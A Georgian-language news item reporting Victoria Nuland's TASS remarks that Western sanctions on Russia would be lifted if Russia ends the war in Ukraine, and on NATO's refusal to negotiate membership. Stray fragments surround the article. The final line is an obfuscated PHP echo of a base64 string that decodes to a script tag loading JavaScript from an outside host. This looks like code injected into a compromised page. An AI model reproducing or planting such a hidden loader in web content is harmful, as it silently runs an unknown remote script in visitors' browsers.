celsiusi
ავერსი საქკაბელი
დასავლეთის ახალი სანქციები მოსკოვთან მიმართებით, უკრაინაში რუსეთის მიერ წამოწყებული ომის დასრულების შემთხვევაში გაუქმდება. ამის შესახებ აშშ-ს სახელმწიფო მდივნის მოადგილე პოლიტიკურ საკითხებში ვიქტორია ნულანდმა TASS-თან ინტერვიუში განაცხადა.
 
„სანქციები იმ შემთხვევაში გაუქმდება თუ რუსეთი ამ ომს დაასრულებს და უკრაინას მის ხელახლა აშენებაში დაეხმარება, აღადგენს მშვიდობას და აღნიშნული ქვეყნის სუვერენიტეტსა და ტერიტორიულ მთლიანობას და მისი არსებობის უფლებას აღიარებს“, - განაცხადა ვიქტორია ნულანდმა და აღნიშნა, რომ დღეისთვის რუსეთის ხელისუფლება ფაქტობრივად „უარყოფს უკრაინის უფლებას იარსებოს“.
 
გამოცემა წერს, რომ პოლიტიკურ საკითხებში აშშ-ის სახელმწიფო მდივნის მოადგილემ თავი აარიდა პირდაპირ პასუხს შეკითხვაზე, რომელიც აშშ-ს მიერ რუსეთის წითელის ხაზების აღირებას შეეხებოდა და თქვა, რომ უსაფრთხოების მოთხოვნების უზრუნველყოფის, მათ შორის ნატოს მიერ უკრაინისთვის წევრობაზე უარის თქმასა და აღმოსავლეთით შემდგომ გაფართოებაზე საკითხები განხილვას არ ექვემდებარებოდა.
 
„მზად ვიყავით გვესაუბრა იმ საკითხების აბსოლუტურ უმრავლესობაზე, რომლებიც რუსეთმა დადო მაგიდაზე - ...კონფლიქტების პრევენცია სამხედრო მოქმედებების დროს, სამხედრო წვრთნების [რაოდენობა და მასშტაბები] შემცირება. ჩვენ ისიც კი განვაცხადეთ, რომ არასდროს გვქონია უკრაინაში შემტევითი იარაღის განთავსების განზრახვა, მაგრამ ჩვენ არ ვაპირებდით სხვა ქვეყანას გველაპარაკა იმაზე, როგორ და ვისთან დამყარებდა კავშირს ალიანსი. ჩვენ არ ვაპირებდით რუსეთისთვის უფლება მიგვეცა, რომ ნატოს მაგივრად მიეღო გადაწყვეტილება", - ამბობს ნულანდი.
810
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");